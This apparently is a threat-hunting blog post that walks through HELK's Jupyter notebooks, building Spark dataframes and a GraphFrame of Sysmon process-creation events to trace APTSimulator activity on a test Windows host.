Let's take a look at using Jupyter Notebooks with the data populated to my Docker-based HELK instance as implemented in Part 1. I repopulated my HELK instance with new data from a different, bare metal Windows instance reporting to HELK with Winlogbeat, Sysmon enabled, and looking mighty compromised thanks to @cyb3rops's APTSimulator.
To make use of Jupyter Notebooks, you need your JUPYTER CURRENT TOKEN to access the Jupyter Notebook web interface. It was presented to you when your HELK installation completed, but you can easily retrieve it via sudo docker logs helk-analytics, then copy and paste the URL into your browser to connect for the first time with a token. It will look like this,
http://localhost:8880/?token=3f46301da4cd20011391327647000e8006ee3574cab0b163, as described in the Installation wiki. After browsing to the URL with said token, you can begin at http://localhost:8880/lab, where you should immediately proceed to the Check_Spark_Graphframes_Integrations.ipynb notebook. It's found in the hierarchy menu under training > jupyter_notebooks > getting_started. This notebook is essential to confirming you're ingesting data properly with HELK and that its integrations are fully functioning. Step through it one cell at a time with the play button, allowing each task to complete so as to avoid errors. Remember the above mentioned Resilient Distributed Dataset? This notebook will create a Spark RDD on top of Elasticsearch using the logs-endpoint-winevent-sysmon-* (Sysmon logs) index as source, and do the same thing with the logs-endpoint-winevent-security-* (Window Security Event logs) index as source, as seen in Figure 2.
 Figure 2: Windows Security EVT Spark RDD
The notebook will also query your Windows security events via Spark SQL, then print the schema with:
df.printSchema()
The result should resemble Figure 3.
 Figure 3: Schema
Assuming all matches with relative consistency in your experiment, let's move on to the Sysmon_ProcessCreate_Graph.ipynb notebook, found in training > jupyter_notebooks. This notebook will again call on the Elasticsearch Sysmon index and create vertices and edges dataframes, then create a graph produced with GraphFrame built from those same vertices and edges. Here's a little walk-through.
The v parameter (yes, for vertices) is populated with:
v = df.withColumn("id", df.process_guid).select("id","user_name","host_name","process_parent_name","process_name","action")
v = v.filter(v.action == "processcreate")
Showing the top three rows of that result set, with v.show(3,truncate=False), appears as Figure 4 in the notebook, with the data from my APTSimulator "victim" system, N2KND-PC.
 Figure 4: WTF, Florian :-)
The epic, uber threat hunter in me believes that APTSimulator created nslookup, 7z, and regedit as processes via cmd.exe. Genius, right? :-)
The e parameter (yes, for edges) is populated with:
e = df.filter(df.action == "processcreate").selectExpr("process_parent_guid as src","process_guid as dst").withColumn("relationship", lit("spawned"))
Showing the top three rows of that result set, with e.show(3,truncate=False), produces the source and destination process IDs as it pertains to the spawning relationship.
Now, to create a graph from the vertices and edges dataframes as defined in the v & e parameters with g = GraphFrame(v, e). Let's bring it home with a hunt for Process A spawning Process B AND Process B Spawning Process C, the code needed, and the result, are seen from the notebook in Figure 5.
 Figure 5: APTSimulator's happy spawn
Oh, yes, APTSimulator fully realized in a nice graph. Great example seen in cmd.exe spawning wscript.exe, which then spawns rundll32.exe. Or cmd.exe spawning powershell.exe and schtasks.exe.
Need confirmation? Florian's CactusTorch JS dropper is detailed in Figure 6, specifically cmd.exe > wscript.exe > rundll32.exe.
 Figure 6: APTSimulator source for CactusTorch